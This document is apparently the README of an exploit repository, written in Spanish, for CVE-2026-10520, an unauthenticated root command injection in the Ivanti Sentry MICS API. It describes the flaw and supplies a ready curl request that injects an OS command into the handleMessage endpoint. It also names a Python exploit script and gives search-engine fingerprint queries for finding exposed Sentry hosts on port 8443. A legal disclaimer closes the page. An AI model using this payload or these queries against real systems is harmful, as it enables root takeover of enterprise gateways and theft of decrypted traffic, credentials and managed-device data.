
RCE a nivel de root mediante inyección de comandos del sistema operativo en Ivanti Sentry
Ivanti Sentry (anteriormente MobileIron Sentry) es una puerta de enlace de seguridad empresarial que actúa como proxy del tráfico entre dispositivos móviles y los recursos backend corporativos: correo electrónico, SharePoint y aplicaciones web internas. Aplica políticas de Mobile Device Management (MDM), termina sesiones móviles cifradas y emite autenticación basada en certificados para el despliegue de aplicaciones empresariales. Las instancias de Sentry suelen estar expuestas a Internet en el puerto8443, exponiendo la API de administración de MICS (Mobile Iron Configuration Service).
CVE-2026-10520 es una vulnerabilidad de inyección de comandos del sistema operativo sin autenticación
que afecta a Ivanti Sentry antes de R10.5.2, R10.6.2 y R10.7.1
(CVSSv3.1: 10 Crítico, incluida en CISA KEV). El fallo está en el endpoint de la API MICS
/mics/api/v2/sentry/mics-config/handleMessage, que acepta
comandos del sistema envueltos en XML mediante un cuerpo POST message codificado en URL
sin autenticación ni validación de entrada. Un atacante que alcanza un
endpoint vulnerable puede ejecutar comandos arbitrarios del sistema como root, obteniendo
el control total del host — incluido el tráfico empresarial descifrado, las
credenciales almacenadas y todos los datos de los dispositivos móviles gestionados.
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443Este repositorio y su contenido se proporcionan estrictamente para investigación de seguridad legítima, pruebas de penetración autorizadas, estudio educativo y fines defensivos. Al acceder o utilizar este material, reconoces plena responsabilidad de garantizar que tus actividades cumplan con todas las leyes aplicables y de haber obtenido la autorización adecuada antes de probar o aplicar estas técnicas contra cualquier sistema que no poseas.
Los autores y mantenedores de este proyecto no asumen ninguna responsabilidad por daños, consecuencias legales o uso indebido resultante de la aplicación de esta información. Cualquier uso para acceso no autorizado, actividad maliciosa o fines ilegales está expresamente prohibido y no recibe soporte.
Úsalo con responsabilidad. Mantente legal. Prueba solo lo que posees o tienes permiso explícito por escrito para probar.
SCT-PL